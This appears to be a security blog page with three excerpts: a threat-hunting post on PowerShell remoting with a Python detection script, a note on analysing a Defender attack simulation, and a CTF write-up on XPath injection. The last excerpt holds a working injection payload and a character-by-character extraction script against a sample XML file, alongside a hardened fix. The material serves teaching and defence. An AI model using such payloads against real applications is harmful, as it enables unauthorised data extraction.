RFC1918 Blog


Threathunting: PowerShell remoting for lateral movement

What is PowerShell remoting?

“Using the WS-Management protocol, Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers. You can establish persistent connections, start interactive sessions, and run scripts on remote computers. To use Windows PowerShell remoting, the remote computer must be configured for remote management. For more information, including instructions, see About Remote Requirements. Once you have configured Windows PowerShell remoting, many remoting strategies are available to you. This article lists just a few of them. For more information, see About Remote.”

Attacker’s Goals:

Windows Remote Management (WinRM) lets users interact with remote systems, including running executables on remote endpoints. Attackers who hold valid credentials can use WinRM to execute code on other hosts and move laterally within a compromised network, which is why the activity is worth hunting for even though it is also how administrators legitimately manage servers.
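The attacker goal above also says what to hunt for. The following script is an added example (not code from the original post) that runs three simple detections over constructed Sysmon-style events: a command spawned by wsmprovhost.exe (the process that hosts a remote PowerShell session on the target), PowerShell connecting to the WinRM ports 5985/5986 from a host that is not an approved jump host, and one host and user reaching several distinct WinRM targets within a short window. The hostnames, users, the jump-host allowlist and the fan-out threshold are assumptions chosen for the example.

```python
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

WINRM_PORTS = {5985, 5986}            # WinRM over HTTP / HTTPS
ADMIN_JUMP_HOSTS = {"JUMP01"}         # assumption: hosts allowed to initiate remoting
FAN_OUT_THRESHOLD = 3                 # assumption: distinct targets that count as fan-out
FAN_OUT_WINDOW = timedelta(minutes=5)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSMPROVHOST = r"C:\Windows\System32\wsmprovhost.exe"


def ev(time: str, host: str, eid: int, **fields) -> dict:
    """Build one Sysmon-style event (ID 1 = process create, ID 3 = network connect)."""
    return {"time": datetime.fromisoformat(time), "host": host, "id": eid, **fields}


# Constructed sample telemetry, not real logs.
EVENTS = [
    ev("2021-04-20T10:00:01", "WS01", 3, Image=PS, User=r"CORP\jsmith",
       DestinationIp="10.0.0.11", DestinationPort=5985),
    ev("2021-04-20T10:00:05", "SRV11", 1, Image=r"C:\Windows\System32\whoami.exe",
       ParentImage=WSMPROVHOST, User=r"CORP\jsmith"),
    ev("2021-04-20T10:00:09", "WS01", 3, Image=PS, User=r"CORP\jsmith",
       DestinationIp="10.0.0.12", DestinationPort=5985),
    ev("2021-04-20T10:00:14", "WS01", 3, Image=PS, User=r"CORP\jsmith",
       DestinationIp="10.0.0.13", DestinationPort=5986),
    # Benign: the approved jump host doing routine management over WinRM.
    ev("2021-04-20T10:01:00", "JUMP01", 3, Image=PS, User=r"CORP\svc_cfg",
       DestinationIp="10.0.0.11", DestinationPort=5985),
    # Benign: an interactive user opening cmd.exe from the shell.
    ev("2021-04-20T10:01:03", "SRV11", 1, Image=r"C:\Windows\System32\cmd.exe",
       ParentImage=r"C:\Windows\explorer.exe", User=r"CORP\bob"),
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def hunt(events: List[dict]) -> Dict[str, List[str]]:
    """Return findings grouped by rule name."""
    findings: Dict[str, List[str]] = defaultdict(list)
    # (source host, user) -> [(time, target ip)] for WinRM connections, in time order
    targets: Dict[tuple, List[tuple]] = defaultdict(list)

    for e in sorted(events, key=lambda x: x["time"]):
        # Rule 1: anything spawned by wsmprovhost.exe ran inside a remote PS session.
        if e["id"] == 1 and basename(e.get("ParentImage", "")) == "wsmprovhost.exe":
            findings["remote_session_child"].append(
                f'{e["host"]}: {basename(e["Image"])} spawned by wsmprovhost.exe as {e["User"]}')
        # Rule 2: outbound WinRM from a host that is not supposed to initiate remoting.
        elif e["id"] == 3 and e.get("DestinationPort") in WINRM_PORTS:
            if e["host"] not in ADMIN_JUMP_HOSTS:
                findings["winrm_from_non_admin_host"].append(
                    f'{e["host"]}: {basename(e["Image"])} -> '
                    f'{e["DestinationIp"]}:{e["DestinationPort"]} as {e["User"]}')
            targets[(e["host"], e["User"])].append((e["time"], e["DestinationIp"]))

    # Rule 3: one host/user touching many WinRM targets in a short window (fan-out).
    for (host, user), conns in targets.items():
        for i, (t0, _) in enumerate(conns):
            window = {ip for t, ip in conns[i:] if t - t0 <= FAN_OUT_WINDOW}
            if len(window) >= FAN_OUT_THRESHOLD:
                findings["winrm_fan_out"].append(
                    f"{host}: {user} reached {len(window)} WinRM targets within {FAN_OUT_WINDOW}")
                break
    return dict(findings)


if __name__ == "__main__":
    for rule, hits in hunt(EVENTS).items():
        print(rule)
        for hit in hits:
            print("  ", hit)
```

Rule 1 is the highest-signal of the three because wsmprovhost.exe has no reason to spawn reconnaissance binaries outside an admin session; rules 2 and 3 need the allowlist tuned to the environment or they will page on every scheduled management job.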

Microsoft 365 Defender attack simulations: Fileless Powershell attack with process injection and SMB Recon

Summary:

Today I will be doing a deep dive into the new Microsoft 365 Defender attack simulations. I will look at the Fileless Powershell attack with process injection and SMB Recon command script, analyzing the PowerShell command script to determine what it does and extracting IOCs (Indicators of Compromise) along the way. The analysis is done without referencing the Microsoft documentation, to demonstrate the investigation process for a suspicious PowerShell command script: analyzing how it behaves and extracting the IOCs needed to actively block and detect related threats.

E.Tree Write-up: Cyber Apocalypse 2021

With Cyber Apocalypse 2021 coming to an end, I wanted to share some write-ups for the more interesting challenges we completed.

Summary:

E.Tree was a Python Flask application that used XPath to query XML files. We were given an example XML file in which some users had an additional selfDestructCode element set. Knowing this, we were able to use an error-based XPath injection to extract the flag character by character.
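To show the mechanics behind that summary, here is an added example (not the challenge's code or the write-up's script) using lxml: a lookup that splices user input into an XPath string, the same lookup hardened with an XPath variable, and an extraction loop that leaks the selfDestructCode element of one member one character at a time. The XML document, member names and flag value are constructed for the example. The write-up's oracle was error-based; this example uses a result-present/absent (boolean) oracle instead, because the application's error handling is not shown here, and the length and substring probing is the same either way.

```python
import string
from typing import List

from lxml import etree

# Constructed sample document (not the challenge's XML): only one member
# carries the selfDestructCode element the write-up describes.
XML_DOC = b"""<staff>
  <member><name>alice</name><role>analyst</role></member>
  <member><name>bob</name><role>operator</role>
    <selfDestructCode>CHTB{fake_flag}</selfDestructCode></member>
</staff>"""
TREE = etree.fromstring(XML_DOC)


def search_vulnerable(name: str) -> List[str]:
    """Lookup that splices user input straight into the XPath string (vulnerable)."""
    query = f"//member[name='{name}']/name/text()"
    return [str(n) for n in TREE.xpath(query)]


def search_hardened(name: str) -> List[str]:
    """Same lookup with an XPath variable: the input is compared, never parsed."""
    query = etree.XPath("//member[name=$name]/name/text()")
    return [str(n) for n in query(TREE, name=name)]


def oracle(name: str, condition: str) -> bool:
    """True when the injected condition holds for the member called `name`.

    Payload shape: name' and <condition> and '1'='1
    which turns the predicate into  name='bob' and <condition> and '1'='1
    """
    payload = f"{name}' and {condition} and '1'='1"
    return bool(search_vulnerable(payload))


# Characters probed per position; quotes are excluded so the payload stays valid.
ALPHABET = string.ascii_letters + string.digits + "_{}"


def leak_self_destruct_code(name: str, max_len: int = 64) -> str:
    """Recover a member's selfDestructCode using only yes/no answers."""
    # string-length() of a missing element is 0, so members without the
    # element come back as an empty string instead of an error.
    length = next((n for n in range(max_len + 1)
                   if oracle(name, f"string-length(selfDestructCode)={n}")), 0)
    leaked = ""
    for pos in range(1, length + 1):
        for ch in ALPHABET:
            if oracle(name, f"substring(selfDestructCode,{pos},1)='{ch}'"):
                leaked += ch
                break
        else:
            leaked += "?"  # character outside ALPHABET
    return leaked


if __name__ == "__main__":
    print(search_vulnerable("x' or '1'='1"))   # every member name: injection works
    print(search_hardened("x' or '1'='1"))     # []: the variable is a plain string
    print(leak_self_destruct_code("bob"))
```

The hardened version is the fix to take away: with `$name` bound as an XPath variable the quote in the input is just a character in a string, so neither the `or '1'='1` bypass nor the substring oracle has anything to attach to.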